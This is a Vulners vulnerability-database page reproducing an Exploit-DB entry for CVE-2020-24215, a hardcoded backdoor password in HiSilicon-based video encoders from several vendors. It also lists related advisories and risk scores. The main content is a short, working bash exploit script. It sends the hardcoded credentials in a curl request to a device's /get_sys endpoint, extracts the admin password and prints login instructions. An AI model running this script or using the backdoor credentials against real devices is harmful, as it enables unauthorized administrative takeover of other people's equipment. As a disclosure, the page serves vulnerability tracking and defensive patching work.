Lucene search
K

HiSilicon Video Encoders - Full admin access via backdoor password

🗓️ 19 Oct 2020 00:00:00Reported by Alexei KojenovType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 264 Views

HiSilicon Video Encoders backdoor password exploit for full admin acces

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-24215
14 Nov 202406:07
circl
CVE
CVE-2020-24215
6 Oct 202013:00
cve
Cvelist
CVE-2020-24215
6 Oct 202013:00
cvelist
NVD
CVE-2020-24215
6 Oct 202013:15
nvd
Packet Storm
HiSilicon Video Encoder Backdoor Password
19 Oct 202000:00
packetstorm
Prion
Hardcoded credentials
6 Oct 202013:15
prion
CERT
IPTV encoder devices contain multiple vulnerabilities
15 Sep 202000:00
cert
#!/usr/bin/env bash

# Exploit Title: HiSilicon video encoders - full admin access via backdoor password
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24215
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979


if [ "$#" -ne 1 ]
then
  echo "Usage: $0 <server>[:<port>]"
  exit 1
fi

printf "retrieving the password... "
password=$(curl -s --user admin:neworange88888888 http://$1/get_sys | \
           grep -oP '(?<=<html_password>).*?(?=</html_password>)')
ret=$?
           
if [ "$ret" -eq 0 ]
then
  echo "the password is '$password'"
  echo "navigate to http://$1 and log into the admin interface with user 'admin' and password '$password'"
else
  echo "ERROR: curl returned $ret"
fi

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Oct 2020 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 25
CVSS 3.19.8
EPSS0.4218
264